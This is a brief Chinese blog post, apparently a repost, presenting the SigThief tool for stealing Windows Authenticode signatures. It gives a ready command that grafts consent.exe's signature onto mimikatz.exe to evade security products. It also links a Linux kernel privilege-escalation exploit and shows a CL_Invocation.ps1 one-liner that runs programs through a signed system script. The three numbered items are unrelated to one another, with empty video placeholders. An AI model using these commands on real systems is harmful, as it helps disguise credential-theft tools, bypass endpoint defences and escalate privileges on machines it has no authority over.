Sigthief
Sigthief是一个由python编写的,可以用于劫持合法的数字签名并绕过Windows的哈希验证机制的脚本工具。也可被红队用于将恶意二进制文件以及PowerShell脚本与本机操作系统文件相混淆,以逃避检测并绕过设备的安全防护。
下载
Github::https://github.com/secretsquirrel/SigThief
使用
1. Sigthief的使用方法也非常简单,命令如下:
python sigthief.py -i c:\Windows\System32\consent.exe -t mimikatz.exe -o mimi.exe
视频演示:
2. Linux内核<4.4.0-83/<4.8.0-58(Ubuntu 14.04 / 16.04) – 提权漏洞。
EXP:https://0day.today/exploit/29351
视频演示:
3.?CL_Invocation调用
Get-AuthenticodeSignature C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 . C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 SyncInvoke calc.exe
视频演示:
转载请注明:即刻安全 » <干货 · 杂铺店>